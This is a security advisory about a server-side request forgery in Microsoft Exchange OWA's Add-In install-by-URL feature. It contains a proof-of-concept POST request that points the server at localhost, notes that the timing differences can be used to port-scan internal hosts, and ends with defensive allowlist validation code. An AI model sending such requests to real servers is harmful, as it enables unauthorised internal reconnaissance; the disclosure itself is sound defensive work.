usd-2021-0021 | Microsoft Exchange Server OWA

Advisory ID: usd20210021
Affected Product: Microsoft Exchange Server 
Affected Version: Latest (Exchange Server 2016, Version 15.1 (Build 2242.4))
Vulnerability Type: CWE-918: Server-Side Request Forgery (SSRF) 
Security Risk: Medium
Vendor URL: https://microsoft.com 
Vendor Status: Not fixed / Disputed

The following behavior was reported to Microsoft in May 2021. After finishing their investigations, Microsoft informed us that this issue does not meet their bar for servicing in a security update. However, they will be fixing it in a future version.

Description

The application can be made to perform requests to other services. From the perspective of those other services, the requests appear to originate from the vulnerable application. By issuing such server-side requests, an attacker may be able to reach services that are bound to the local interface of the vulnerable system and would therefore normally not be reachable over the network. In addition, an SSRF attack can provide access to the local network in which the server is located.

The Exchange Server’s OWA component allows users to manage Add-Ins. Users may install Add-Ins through several mechanisms, including installation by URL. The Exchange Server does not sufficiently validate the supplied URL, which results in an SSRF to localhost.

Proof of Concept (PoC)

The following request aims to add a new Add-In by URL:

POST /owa/service.svc?action=NewApp&EP=1&ID=-111&AC=1 HTTP/1.1
Host: mail.example.com
Connection: close
Content-Length: 0
X-OWA-CANARY: dw6RrSW5xkeohY7IO6eScYBwLs2gC9kIomQo6IaQazVuNzOfEdnWOkdAizP_HzwRWj3HoqnG11A.
X-OWA-ActionId: -111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
client-request-id: 5E41776E617341E7972F258E1E6F4D9B_161977115997179
X-OWA-UrlPostData: %7B%22__type%22%3A%22NewAppDataRequest%3A%23Exchange%22%2C%22Header%22%3A%7B%22__type%22%3A%22JsonRequestHeaders%3A%23Exchange%22%2C%22RequestServerVersion%22%3A%22Exchange2013%22%2C%22TimeZoneContext%22%3A%7B%22__type%22%3A%22TimeZoneContext%3A%23Exchange%22%2C%22TimeZoneDefinition%22%3A%7B%22__type%22%3A%22TimeZoneDefinitionType%3A%23Exchange%22%2C%22Id%22%3A%22W.%20Europe%20Standard%20Time%22%7D%7D%7D%2C%22AppInfo%22%3A%7B%22__type%22%3A%22NewAppInfo%3A%23Exchange%22%2C%22DownloadOnly%22%3Atrue%2C%22Url%22%3A%22http%3A%2F%2Flocalhost%3A81%22%7D%7D
X-Requested-With: XMLHttpRequest
Action: NewApp
X-OWA-ActionName: NewAppAction
X-OWA-ClientBuildVersion: 15.1.2176.12
X-OWA-CorrelationId: 5E41776E617341E7972F258E1E6F4D9B_161977115997179
Content-Type: application/json; charset=UTF-8
X-OWA-ClientBegin: 2021-04-30T08:25:59.971
X-OWA-Attempt: 1
Origin: https://mail.example.com
Cookie: [REDACTED]
[...]

The X-OWA-UrlPostData header decodes to the following:

{"__type":"NewAppDataRequest:#Exchange","Header":{"__type":"JsonRequestHeaders:#Exchange","RequestServerVersion":"Exchange2013","TimeZoneContext":{"__type":"TimeZoneContext:#Exchange","TimeZoneDefinition":{"__type":"TimeZoneDefinitionType:#Exchange","Id":"W. Europe Standard Time"}}},"AppInfo":{"__type":"NewAppInfo:#Exchange","DownloadOnly":true,"Url":"http://localhost:81"}}

When multiple localhost ports are supplied as the Url parameter, clear timing differences can be observed in the responses.

A malicious actor could use these differences in response time to port-scan localhost or the local network.

Fix

It is recommended to evaluate whether server-side requests are needed at all. If server-side requests are absolutely necessary, the corresponding function should be restricted to an allowlist of permitted destinations (scheme, host and port), so that loopback and internal addresses can never be requested.
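As an added illustration (not code from the advisory, from usd AG or from Microsoft), the following Python decodes the X-OWA-UrlPostData payload shown in the PoC above and applies the allowlist approach recommended here to the AppInfo.Url value. The allowlisted hosts and the function names are hypothetical; the header value is the one from the PoC.

```python
import ipaddress
import json
from urllib.parse import unquote, urlsplit

# Hypothetical allowlist of manifest hosts an administrator trusts (constructed).
ALLOWED_MANIFEST_HOSTS = {"addins.example.com", "appsource.example.net"}

# X-OWA-UrlPostData value taken from the advisory's PoC request.
POC_URL_POST_DATA = (
    "%7B%22__type%22%3A%22NewAppDataRequest%3A%23Exchange%22%2C%22Header%22%3A%7B%22__type%22"
    "%3A%22JsonRequestHeaders%3A%23Exchange%22%2C%22RequestServerVersion%22%3A%22Exchange2013"
    "%22%2C%22TimeZoneContext%22%3A%7B%22__type%22%3A%22TimeZoneContext%3A%23Exchange%22%2C%22"
    "TimeZoneDefinition%22%3A%7B%22__type%22%3A%22TimeZoneDefinitionType%3A%23Exchange%22%2C%22"
    "Id%22%3A%22W.%20Europe%20Standard%20Time%22%7D%7D%7D%2C%22AppInfo%22%3A%7B%22__type%22%3A"
    "%22NewAppInfo%3A%23Exchange%22%2C%22DownloadOnly%22%3Atrue%2C%22Url%22%3A%22http%3A%2F%2F"
    "localhost%3A81%22%7D%7D"
)


def extract_addin_url(url_post_data: str) -> str:
    """URL-decode the header, parse the JSON body and return AppInfo.Url."""
    payload = json.loads(unquote(url_post_data))
    return payload["AppInfo"]["Url"]


def is_internal_host(host: str) -> bool:
    """True for 'localhost' names and IP literals in loopback/private/link-local ranges.
    DNS names are not resolved here; they are decided by the allowlist instead."""
    lowered = host.lower()
    if lowered == "localhost" or lowered.endswith(".localhost"):
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # not an IP literal
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def validate_addin_url(url: str, allowed_hosts=ALLOWED_MANIFEST_HOSTS) -> tuple:
    """Allowlist check for an Add-In manifest URL: returns (accepted, reason)."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        return False, f"scheme {parts.scheme!r} not permitted"
    host = parts.hostname or ""
    if not host:
        return False, "missing host"
    if parts.port not in (None, 443):          # blocks the port-probing shown above
        return False, f"port {parts.port} not permitted"
    if is_internal_host(host):
        return False, "host is a loopback/private/link-local literal"
    if host.lower() not in allowed_hosts:
        return False, f"host {host!r} not on allowlist"
    return True, "ok"
```

Because hostnames are not resolved here, the allowlist is what keeps a name that points at an internal address from passing; a production check should additionally verify the resolved address at connect time.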

References

Timeline

  • 2021-05-03: This vulnerability was identified by Lauritz Holtmann.
  • 2021-05-07: Advisory submitted to vendor via e-mail.
  • 2021-05-25: Vendor states that they will be fixing this issue in a future version.
  • 2021-06-30: Security advisory released by usd AG.

Credits

This security vulnerability was found by Lauritz Holtmann of usd AG.

ABOUT usd SECURITY ADVISORIES

In order to protect businesses against hackers and criminals, we always have to keep our skills and knowledge up to date. Thus, security research is just as important for our work as is building up a security community to promote the exchange of knowledge. After all, more security can only be achieved if many individuals take on the task.

Our CST Academy and our usd HeroLab are essential parts of our security mission. We share the knowledge we gain in our practical work and our research through training courses and publications. In this context, the usd HeroLab publishes a series of papers on new vulnerabilities and current security issues.

Always for the sake of our mission: „more security.“

In accordance with usd AG’s Responsible Disclosure Policy, all vendors have been notified of the existence of these vulnerabilities.

Disclaimer

The information provided in this security advisory is provided „as is“ and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible.